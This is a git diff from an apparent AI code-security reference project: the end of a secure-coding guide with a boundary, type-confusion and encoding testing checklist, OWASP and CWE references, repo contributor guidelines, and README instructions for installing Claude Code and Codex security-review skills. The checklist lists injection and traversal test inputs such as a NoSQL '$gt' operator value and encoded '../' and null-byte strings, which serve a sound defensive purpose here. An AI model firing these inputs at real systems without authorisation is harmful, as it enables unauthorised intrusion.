Boundary Testing: + - Empty strings, null, undefined + - Max length + 1 + - Integer boundaries (MAX_INT, MIN_INT) + - Unicode normalization variants + +2. Type Confusion: + - Array where string expected: ["value"] + - Object where string expected: {"$gt": ""} + - Number where string expected: 12345 + - Boolean where object expected: true + +3. Encoding Bypass: + - URL encoding: %00, %2e%2e%2f + - Unicode: \u0000, \ufeff + - Double encoding: %252e + - Overlong UTF-8 + +4. ReDoS Testing: + - For each regex, test with: (valid_char * 30) + invalid_char + - Measure response time (should be < 100ms) + - Use regex-dos-detector tools + +// Testing Checklist +- [ ] Test all endpoints with null/empty values +- [ ] Test numeric fields with boundary values +- [ ] Test string fields with max length exceeded +- [ ] Test type confusion for all input fields +- [ ] Test regex patterns for ReDoS +- [ ] Verify server-side validation matches client-side +- [ ] Test Unicode normalization issues +``` + +--- + +# Additional Patterns Reference + +This depth document covers the 6 most critical patterns in extensive detail. 
For coverage of additional security anti-patterns, see [[ANTI_PATTERNS_BREADTH]], which includes: + +| Pattern Category | Patterns Covered | +|-----------------|------------------| +| **File System Security** | Path traversal, unsafe file uploads, insecure temp files | +| **Access Control** | Missing authorization checks, IDOR, privilege escalation | +| **Network Security** | SSRF, insecure deserialization, unvalidated redirects | +| **Error Handling** | Information disclosure, stack traces, verbose errors | +| **Logging Security** | Sensitive data in logs, insufficient logging | +| **Concurrency** | Race conditions, TOCTOU, deadlocks | +| **Dependency Security** | Outdated dependencies, slopsquatting, lockfile tampering | +| **Configuration** | Debug mode in production, default credentials | +| **API Security** | Mass assignment, excessive data exposure, rate limiting | + +Use the breadth document for quick reference across many patterns. Use this depth document for comprehensive understanding of the most critical patterns. 
+
+---
+
+# External Resources
+
+## OWASP Resources
+
+- **OWASP Top 10 (2021):** https://owasp.org/Top10/
+- **OWASP Cheat Sheet Series:** https://cheatsheetseries.owasp.org/
+- **OWASP Testing Guide:** https://owasp.org/www-project-web-security-testing-guide/
+- **OWASP ASVS:** https://owasp.org/www-project-application-security-verification-standard/
+
+### Relevant Cheat Sheets
+
+| Pattern | OWASP Cheat Sheet |
+|---------|-------------------|
+| Secrets Management | [Secrets Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html) |
+| SQL Injection | [Query Parameterization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html) |
+| XSS | [XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html) |
+| Authentication | [Authentication Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html) |
+| Session Management | [Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html) |
+| Cryptography | [Cryptographic Storage Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html) |
+| Input Validation | [Input Validation Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html) |
+
+## CWE References
+
+- **CWE Top 25 (2024):** https://cwe.mitre.org/top25/archive/2024/2024_cwe_top25.html
+- **CWE/SANS Top 25:** https://www.sans.org/top25-software-errors/
+
+### CWE Mappings for This Document
+
+| Pattern | Primary CWEs |
+|---------|--------------|
+| Hardcoded Secrets | CWE-798, CWE-259, CWE-321, CWE-200 |
+| SQL Injection | CWE-89, CWE-564 |
+| Command Injection | CWE-78, CWE-77 |
+| XSS | CWE-79, CWE-80, CWE-83, CWE-87 |
+| Authentication | CWE-287, CWE-384, CWE-613, CWE-307 |
+| Session Security | CWE-384, CWE-613, CWE-614, CWE-1004 |
+| Cryptographic Failures | CWE-327, CWE-328, CWE-329, CWE-338, CWE-916 |
+| Input Validation | CWE-20, CWE-1333, CWE-185, CWE-176 |
+
+## AI Code Security Research
+
+- **Asleep at the Keyboard (GitHub Copilot Security Analysis):** https://arxiv.org/abs/2108.09293
+- **Stanford Study ("Do Users Write More Insecure Code with AI Assistants?"):** https://arxiv.org/abs/2211.03622
+- **USENIX Package Hallucination Study (2024):** https://www.usenix.org/conference/usenixsecurity24
+- **Veracode State of Software Security (2024-2025):** https://www.veracode.com/state-of-software-security-report
+- **Snyk Developer Security Survey (2024):** https://snyk.io/reports/
+
+## Security Testing Tools
+
+| Tool | Purpose | URL |
+|------|---------|-----|
+| Semgrep | Static analysis with security rules | https://semgrep.dev |
+| CodeQL | GitHub security queries | https://codeql.github.com |
+| TruffleHog | Secret scanning | https://github.com/trufflesecurity/trufflehog |
+| SQLMap | SQL injection testing | https://sqlmap.org |
+| Burp Suite | Web security testing | https://portswigger.net/burp |
+| OWASP ZAP | Open source web security scanner | https://www.zaproxy.org |
+| jwt_tool | JWT security testing | https://github.com/ticarpi/jwt_tool |
+| gitleaks | Git secret scanning | https://github.com/gitleaks/gitleaks |
+
+---
+
+# Document Information
+
+**Document:** AI Code Security Anti-Patterns: Depth Version
+**Version:** 1.0.0
+**Last Updated:** 2026-01-18
+**Patterns Covered:** 6 (Hardcoded Secrets, SQL/Command Injection, XSS, Authentication/Session, Cryptography, Input Validation)
+
+## Change Log
+
+| Date | Version | Changes |
+|------|---------|---------|
+| 2026-01-18 | 1.0.0 | Initial release with 6 comprehensive pattern deep-dives |
+
+## Related Documents
+
+- [[ANTI_PATTERNS_BREADTH]] - Quick reference covering 25+ security patterns
+- [[Ranking-Matrix]] - Priority scoring methodology and pattern rankings
+- [[Pseudocode-Examples]] - Additional code examples for all patterns
+
+## Contributing
+
+This document is maintained as part of the AI Code Security Anti-Patterns project. Security patterns evolve as new research emerges and AI models change. Contributions welcome for:
+
+- New edge cases and exploitation techniques
+- Updated statistics and research citations
+- Additional testing methodologies
+- Framework-specific secure coding examples
+
+---
+
+*This document is designed to be included in AI assistant context windows to improve the security of generated code. For maximum effectiveness, include along with [[ANTI_PATTERNS_BREADTH]] when reviewing or generating security-sensitive code.*
+
+---
+
+**END OF DOCUMENT**
diff --git a/AGENTS.md b/AGENTS.md
new file mode 100644
index 0000000..3ba14a8
--- /dev/null
+++ b/AGENTS.md
@@ -0,0 +1,32 @@
+# Repository Guidelines
+
+This repository is a content-first security reference. It ships two large Markdown guides plus a static landing page.
+
+## Project Structure & Module Organization
+- `ANTI_PATTERNS_BREADTH.md`: Broad catalog of 25+ AI code security anti-patterns with quick references.
+- `ANTI_PATTERNS_DEPTH.md`: Deep-dive coverage of the 7 highest-priority vulnerabilities.
+- `index.html`: Static landing page for the GitHub Pages site.
+- `README.md`: Project overview, usage guidance, and source context.
+
+## Build, Test, and Development Commands
+There are no build or test scripts in this repository today.
+- To preview changes, open `index.html` in a browser.
+- To edit content, modify the Markdown files directly.
+
+## Coding Style & Naming Conventions
+- Markdown: keep headings short and scannable; use fenced code blocks for examples.
+- HTML: keep changes minimal and readable; prefer semantic elements.
+- Filenames follow `UPPER_SNAKE_CASE.md` for the large guides and conventional names for web assets.
+
+## Testing Guidelines
+No automated tests are configured. If you add tests or tooling, document the command(s) here and in `README.md`.
+
+## Commit & Pull Request Guidelines
+Recent history uses simple, descriptive summaries like `Update index.html` or `Update README.md`.
+- Use short, direct commit messages that name the file or feature you changed.
+- PRs should include a brief description of the change and, if relevant, a link to supporting sources or examples.
+
+## Security & Content Integrity
+- Do not include secrets or sensitive data in examples.
+- Ensure any new anti-patterns include mitigation guidance and clear BAD/GOOD comparisons.
+- If adding statistics, provide a credible source and keep wording precise.
diff --git a/README.md b/README.md
index eaf1106..9c00abb 100644
--- a/README.md
+++ b/README.md
@@ -136,10 +136,87 @@ The goal isn't to replace human security review—it's to catch the obvious, wel
 
 ---
 
+## Install
+
+### Option 1: Clone with Git
+```
+git clone https://github.com/arcanum-sec/sec-context.git
+cd sec-context
+```
+
+### Option 2: Download ZIP
+Download the repository ZIP from GitHub, extract it, and open the folder.
+
+### Files You'll Use
+```
+ANTI_PATTERNS_BREADTH.md
+ANTI_PATTERNS_DEPTH.md
+```
+
+If you only want the content, those two files are all you need.
+
+---
+
 ## Contributing
 
 Found a pattern we missed? Have a better example? PRs are welcome =)
 
 ---
 
+## Claude Skill (Claude Code)
+
+This repo includes a Claude skill at `.claude/skills/security-review-swarm`.
+
+### What it does
+`security-review-swarm` orchestrates parallel security-review agents to scan code for the anti-patterns in this repo. It supports a fast single-agent scan and deeper multi-agent reviews.
+
+### Usage
+```
+/security-review              # quick breadth review
+/security-review src/         # review a specific path
+/security-review --deep       # deep single-agent audit
+/security-review --full       # full swarm: parallel specialists
+```
+
+### Review modes
+- **Quick (default):** one agent using breadth patterns (25+).
+- **Deep (`--deep`):** one agent using depth patterns (7 critical).
+- **Full (`--full`):** seven parallel specialists (secrets, injection, XSS, auth, crypto, input validation, dependencies).
+
+### Auto-escalation rules
+The swarm skill automatically switches to **deep** or **full** review when:
+- Paths include auth/session/payment/crypto-related folders.
+- File contents include tokens/secrets/JWT-related keywords.
+- The scope is large (50+ files) or the user requests a comprehensive audit.
+
+### Install
+Copy `.claude/skills/security-review-swarm` into your Claude Code skills directory and enable it there. The skill references `references/ANTI_PATTERNS_BREADTH.md` and `references/ANTI_PATTERNS_DEPTH.md` bundled in the same folder.
+
+## Codex Skill (CLI)
+
+### Install (from GitHub)
+Use the Codex installer script:
+```bash
+scripts/install-skill-from-github.py --repo gusfraser/sec-context --path .codex/skills/sec-context
+```
+
+To install from the upstream repo instead:
+```bash
+scripts/install-skill-from-github.py --repo Arcanum-Sec/sec-context --path .codex/skills/sec-context
+```
+
+Restart Codex after installation so the new skill is picked up.
+
+### Install (manual copy)
+1. Copy the skill folder into your Codex skills directory:
+   - Example: `$CODEX_HOME/skills/sec-context`
+2. The skill bundles its references under:
+   - `.codex/skills/sec-context/references/ANTI_PATTERNS_BREADTH.md`
+   - `.codex/skills/sec-context/references/ANTI_PATTERNS_DEPTH.md`
+
+### Verify
+Open `SKILL.md` to confirm the frontmatter and references resolve as expected in your environment.
+
+---
+
 *Built by synthesizing 150+ sources across academic papers, CVE databases, security blogs, and developer communities. Because AI shouldn't keep making the same security mistakes.*
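The auto-escalation rules in the `README.md` hunk are stated only in prose. As a rough illustration, they might be checked along the following lines. This is a minimal sketch, not the skill's actual logic: the function name `should_escalate`, the keyword lists, and the substring matching on folder names are all assumptions, since the README names the categories but not the exact terms. The README also does not say how the skill chooses between **deep** and **full**, so the sketch only reports whether any rule matched.

```python
from pathlib import PurePosixPath

# Hypothetical keyword lists: the README gives categories, not exact terms.
SENSITIVE_FOLDER_HINTS = ("auth", "session", "payment", "crypto")
SENSITIVE_CONTENT_HINTS = ("token", "secret", "jwt")
LARGE_SCOPE_FILE_COUNT = 50  # "50+ files" in the README


def should_escalate(files: dict[str, str], comprehensive_requested: bool = False) -> bool:
    """Return True when any of the README's escalation rules matches.

    `files` maps a relative POSIX-style path to that file's text content.
    """
    # Rule 3: large scope, or the user asked for a comprehensive audit.
    if comprehensive_requested or len(files) >= LARGE_SCOPE_FILE_COUNT:
        return True

    for path, content in files.items():
        # Rule 1: a folder in the path looks security-sensitive.
        # Substring matching is deliberately loose and may over-match.
        folders = [part.lower() for part in PurePosixPath(path).parent.parts]
        if any(hint in folder for folder in folders for hint in SENSITIVE_FOLDER_HINTS):
            return True

        # Rule 2: the file content mentions secret-like keywords.
        lowered = content.lower()
        if any(hint in lowered for hint in SENSITIVE_CONTENT_HINTS):
            return True

    return False
```

A caller could run this over the files in scope before picking a mode, for example `should_escalate({"src/auth/login.py": source_text})`.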